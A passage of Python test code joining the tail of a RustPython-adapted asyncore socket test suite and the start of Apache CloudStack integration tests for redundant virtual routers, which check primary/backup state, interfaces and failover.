# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, Windows-only fail")
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
support.join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
test_redundant_router.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkOffering,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls._cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetworkOffering(self):
"""Test create RvR supported network offering
"""
# Steps to validate
# 1. create a network offering
# - all services by VirtualRouter
# - enable RedundantRouter servicecapability
# 2. enable the network offering
# Validate the following
# 1. Redundant Router offering should be created successfully and
# listed in listNetworkOfferings response
# assert if RvR capability is enabled
self.debug("Creating network offering with redundant VR capability")
try:
network_offering = NetworkOffering.create(
self.apiclient,
self.testdata["nw_off_isolated_RVR"],
conservemode=True
)
except Exception as e:
self.fail("Create network offering failed! - %s" % e)
self.debug("Enabling network offering - %s" % network_offering.name)
# Enable Network offering
network_offering.update(self.apiclient, state='Enabled')
self.cleanup.append(network_offering)
self.debug("Checking if the network offering created successfully?")
network_offs = NetworkOffering.list(
self.apiclient,
id=network_offering.id,
listall=True
)
self.assertEqual(
isinstance(network_offs, list),
True,
"List network offering should not return empty response"
)
self.assertEqual(
len(network_offs),
1,
"List network off should have newly created network off"
)
for service in network_offs[0].service:
if service.name == 'SourceNat':
self.debug("Verifying SourceNat capabilites")
for capability in service.capability:
if capability.name == 'RedundantRouter':
self.assertTrue(capability.value == 'true')
self.debug("RedundantRouter is enabled")
return
class TestCreateRvRNetwork(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetwork(self):
"""Test create network with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Redundant states: %s, %s" % (
primary_router.redundantstate,
backup_router.redundantstate
))
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkNonDefaultGuestCidr,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_createRvRNetwork(self):
"""Test create network with non-default guest cidr with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# - gw = 192.168.2.1 and cidr = 192.168.2.0/23
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id,
netmask='255.255.254.0',
gateway='192.168.2.1'
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.assertEqual(
nw_response.gateway,
'192.168.2.1',
"The gateway should be 192.168.2.1"
)
self.assertEqual(
nw_response.cidr,
'192.168.2.0/23',
"Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestRVRInternals(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.hypervisor = self.testClient.getHypervisorInfo()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_redundantVR_internals(self):
"""Test redundant router internals
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# 2. listRouters in above network
# 3. deployVM in above user account in the created network
# 4. login to both Redundant Routers
# 5. login to user VM
# 6. delete user account
# Validate the following:
# 1. listNetworks lists network in Allocated state
# 2. listRouters lists no routers created yet
# 3. listRouters returns Primary and Backup routers
# 4. ssh in to both routers and verify:
# - PRIMARY router has eth2 with public Ip address
# - BACKUP router has only guest eth0 and link local eth1
# - Broadcast on PRIMARY eth2 is non-zero (0.0.0.0)
# - execute checkrouter.sh in router home and check if it is status
# "PRIMARY|BACKUP" as returned by the listRouters API
# 5. DNS of the user VM is set to RedundantRouter Gateway
# (/etc/resolv.conf)
# Check that the default gateway for the guest is the rvr gateway
# and not the guestIp of either of the RvRs
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Fetching the host details for double hop into router")
hosts = Host.list(
self.apiclient,
id=primary_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
primary_host = hosts[0]
self.debug("Host for primary router: %s" % primary_host.name)
self.debug("Host for primary router: %s" % primary_host.ipaddress)
hosts = Host.list(
self.apiclient,
id=backup_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
backup_host = hosts[0]
self.debug("Host for backup router: %s" % backup_host.name)
self.debug("Host for backup router: %s" % backup_host.ipaddress)
self.debug(primary_router.linklocalip)
# Check eth2 port for primary router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
primary_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
primary_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
primary_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.debug("Router's public Ip: %s" % primary_router.publicip)
self.assertEqual(
res.count("state UP"),
1,
"PRIMARY router's public interface should be UP"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
# Check eth2 port for backup router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
backup_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
backup_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
backup_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.assertEqual(
res.count("state DOWN"),
1,
"BACKUP router's public interface should be DOWN"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
vms = VirtualMachine.list(
self.apiclient,
id=virtual_machine.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List VMs should not return empty response"
)
vm = vms[0]
self.assertNotEqual(
vm.nic[0].gateway,
primary_router.publicip,
"The gateway of user VM should be same as primary router"
)
self.assertNotEqual(
vm.nic[0].gateway,
backup_router.publicip,
"The gateway of user VM should be same as backup router"
)
return
class TestRvRRedundancy(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls.network_offering_for_update=NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering_for_update)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls.network_offering_for_update.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.insert(0, self.account)
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_01_stopPrimaryRvR(self):
"""Test stop primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is Primary. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN, and the old BACKUP router as
# new PRIMARY
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the PRIMARY router")
try:
Router.stop(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
